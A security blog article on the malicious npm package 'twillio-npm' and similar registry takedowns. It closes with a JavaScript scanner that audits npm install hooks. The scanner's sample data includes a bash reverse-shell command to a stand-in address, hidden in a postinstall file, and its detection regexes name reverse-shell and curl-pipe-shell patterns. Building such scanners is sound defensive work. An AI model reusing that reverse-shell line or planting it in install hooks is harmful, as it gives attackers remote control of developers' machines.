Open-Source Code Attacks Continue

npm removed yet another malicious package from its registry this week. It marks the fourth major takedown in three months for npm.

Two days ago, npm removed a malicious JavaScript package from its registry. The package contained code that opened a backdoor (a reverse shell) on the computers of developers who installed it. This is the fourth major npm takedown in the last three months, and it's unlikely to slow down now. Open-source code attacks might be here for a while.

Previously, we discussed that all open-source code should be reviewed prior to use. This should have been an automatic step for programmers anyway, but as humans, we tend to be more trusting than not. Unfortunately, that paves the way for bad actors to get in and do damage. The latest package, named "twillio-npm," was discovered by Sonatype, a company that monitors public package repositories as part of its DevOps services.

The Sonatype report says the package was published this past Friday on the npm registry. It was discovered the same day and removed on Monday after the npm security team blacklisted it. The package had a pretty short lifespan on npm, but was still downloaded more than 370 times. Its payload ran automatically at install time in any JavaScript project built and managed via the npm command-line utility; the project never had to import or call the package for the code to execute. It appears the reverse shell the package opens only worked on UNIX-based systems.

From ZDNet, “Any computer that has this package installed or running should be considered fully compromised,” the npm security team said today, confirming Sonatype’s investigation. “All secrets and keys stored on that computer should be rotated immediately from a different computer,” the npm team added.

As stated above, this is the fourth major takedown of malicious packages from the npm registry in the last three months. August saw one malicious npm package removed. September saw four packages removed. And, in the last two weeks, three more packages were removed. Counting twillio-npm, that's a total of nine malicious packages removed from npm in a very short amount of time.

Humans tend to trust other humans until given a reason not to. We've been warned for years that this could happen, and it's actually surprising that it has taken this long for the problem to become this visible. Open-source code sharing has been around for a long time, and programmers often figure out new ways to write code or to automate something that previously wasn't automated. They work together not only to simplify the coding process, but to collaborate and come up with solutions together.

Having a bad actor come inside their world should make programmers feel violated, although they shouldn’t be surprised either. But they should be incredibly angry and frustrated. This is a place they should be able to go to find a solution to a problem they have. They might find that solution, but now they know they might also import malicious code with that solution.

Open-source code should always be reviewed, whether it comes from the npm registry, GitHub or somewhere else. Before the last few months, most programmers would have laughed off the need to review open-source package code. But now? Now it's a much-needed step in the process.

This really goes to show that bad actors are everywhere. They will do whatever they can, whatever it takes to infiltrate a business and steal whatever information they can gain. This could be personal, private and sensitive information. It could be proprietary business information or intellectual property. It could be stealing compute, cryptomining or simply holding your business systems hostage until a ransom is paid. Whatever the method, one thing is for sure: Bad actors will do whatever it takes to get what they want, and anyone in the way better move or get run over.

Don't be the next victim. Do an intense security review now, before 2021 starts and a new budget is in place. Make a plan to fix anything that needs fixing. Review dependency code, including the scripts a package runs at install time, for unwanted behavior. Review IAM controls to ensure least privilege. Review all cloud services to ensure proper use, that all services are actually being used, and that you know what normal looks like and have alerts set around it. Review or scan your open-source packages. If you don't know how, or want an outsider's opinion to ensure nothing is missed, hire an expert. Under the thumb of a pandemic, cybersecurity in 2020 is a major factor in business success. Don't let your business fail because you missed an opportunity to fix a problem!
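As an added example (not code from the original post, and not from Sonatype or npm), the script below shows both the mechanism twillio-npm abused and one way to do the package review urged above. npm runs a package's install-time lifecycle hooks (preinstall, install, postinstall, prepare) during `npm install`, before the project ever imports the package. The script walks a constructed, in-memory stand-in for node_modules, lists every dependency that registers such a hook, follows the hook command to the local file it hands to node or sh, and flags reverse-shell, remote-fetch and hidden-execution indicators in either place. The package names, file contents and the 198.51.100.7 address are invented for the example; the indicator list is a starting heuristic, not a complete signature set.

```javascript
// Added example, not from the original post: audit npm install-time
// lifecycle hooks in a dependency tree and flag reverse-shell indicators.
// Runs offline against a constructed in-memory tree (SAMPLE_TREE below).

// Hooks npm runs automatically during `npm install`. A package with one of
// these executes on the developer's machine without ever being require()'d.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic indicators of a reverse shell, remote code fetch or hidden
// execution. Constructed for this example; extend for your environment.
const SUSPICIOUS = [
  { name: 'bash-reverse-shell', re: /\/dev\/tcp\/|bash\s+-i|\bnc\s+(-e|-c)|mkfifo/i },
  { name: 'remote-fetch-exec', re: /(curl|wget)[^|;&]*\|\s*(sh|bash|node)\b/i },
  { name: 'node-child-process', re: /child_process|\bexec(Sync)?\(|\bspawn(Sync)?\(/ },
  { name: 'eval-or-encoding', re: /\beval\(|new Function\(|base64/i },
];

// Constructed stand-in for node_modules: path -> file content. None of these
// packages exist. "evil-sample" imitates the behaviour described in the post
// (a postinstall hook that opens a reverse shell); 198.51.100.7 is a
// documentation-range address, not a real listener.
const SAMPLE_TREE = {
  'node_modules/evil-sample/package.json': JSON.stringify({
    name: 'evil-sample', version: '1.0.0',
    scripts: { postinstall: 'node install.js' },
  }),
  'node_modules/evil-sample/install.js':
    "require('child_process').exec('bash -i >& /dev/tcp/198.51.100.7/4444 0>&1');",
  'node_modules/benign-sample/package.json': JSON.stringify({
    name: 'benign-sample', version: '2.3.1',
    scripts: { test: 'mocha', postinstall: 'node scripts/banner.js' },
  }),
  'node_modules/benign-sample/scripts/banner.js':
    "console.log('thanks for installing benign-sample');",
  'node_modules/plain-sample/package.json':
    JSON.stringify({ name: 'plain-sample', version: '0.1.0' }),
};

// Minimal POSIX path helpers so the example has no module dependencies.
const dirname = (p) => p.slice(0, p.lastIndexOf('/'));
const basename = (p) => p.slice(p.lastIndexOf('/') + 1);
const join = (dir, rel) => `${dir}/${rel.replace(/^\.\//, '')}`;

// Local files a hook command hands to an interpreter, e.g. "node install.js".
// The hook line itself usually looks harmless; the payload lives in the file.
function scriptTargets(pkgDir, command) {
  const targets = [];
  const re = /\b(?:node|sh|bash)\s+([^\s;&|]+)/g;
  let m;
  while ((m = re.exec(command)) !== null) targets.push(join(pkgDir, m[1]));
  return targets;
}

// Audit one package: report every install hook, with any indicators found in
// the hook command or in the local files it runs.
function auditPackage(tree, manifestPath) {
  const manifest = JSON.parse(tree[manifestPath]);
  const pkgDir = dirname(manifestPath);
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    const sources = [{ where: `${hook} command`, text: command }];
    for (const file of scriptTargets(pkgDir, command)) {
      if (tree[file] !== undefined) sources.push({ where: file, text: tree[file] });
    }
    const indicators = [];
    for (const src of sources) {
      for (const sig of SUSPICIOUS) {
        if (sig.re.test(src.text)) indicators.push(`${sig.name} in ${src.where}`);
      }
    }
    findings.push({ package: manifest.name, hook, command, indicators });
  }
  return findings;
}

// Audit every package.json in the tree.
function auditTree(tree) {
  return Object.keys(tree)
    .filter((p) => basename(p) === 'package.json')
    .flatMap((p) => auditPackage(tree, p));
}

// "withHooks": review by hand even if nothing fired. "flagged": an indicator hit.
function summarize(findings) {
  const names = (list) => [...new Set(list.map((f) => f.package))].sort();
  return {
    withHooks: names(findings),
    flagged: names(findings.filter((f) => f.indicators.length > 0)),
  };
}

function printReport(tree) {
  const report = auditTree(tree);
  for (const f of report) {
    const status = f.indicators.length ? 'FLAGGED' : 'review';
    console.log(`${status}: ${f.package} ${f.hook} -> "${f.command}" ${f.indicators.join('; ')}`);
  }
  console.log(JSON.stringify(summarize(report)));
}

printReport(SAMPLE_TREE);
```

On a real tree, replace SAMPLE_TREE with a walk of node_modules that reads each package.json and the files its hooks reference from disk. Any package that registers an install hook deserves a look even when no indicator fires, because a hook that reads `node install.js` is harmless on its face and the scanner only catches payloads that match its patterns. The shortest defensive change is to stop npm from running hooks at all: `npm install --ignore-scripts`, or `npm config set ignore-scripts true`, then enable scripts only for the dependencies that genuinely need a build step.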

About the Author

Pieter VanIperen, Managing Partner of PWV Consultants, leads a boutique group of industry leaders and influencers from the digital tech, security and design industries that acts as a trusted technical partner for many Fortune 500 companies, high-visibility startups, universities, defense agencies, and NGOs. He is a 20-year software engineering veteran who founded or co-founded several companies. He acts as a trusted advisor and mentor to numerous early-stage startups, and has held the titles of software and software security executive, consultant and professor. His expert consulting and advisory work spans several industries, including finance, media, medical tech, and defense contracting. He also authored the highly influential precursor HAZL (jADE) programming language.
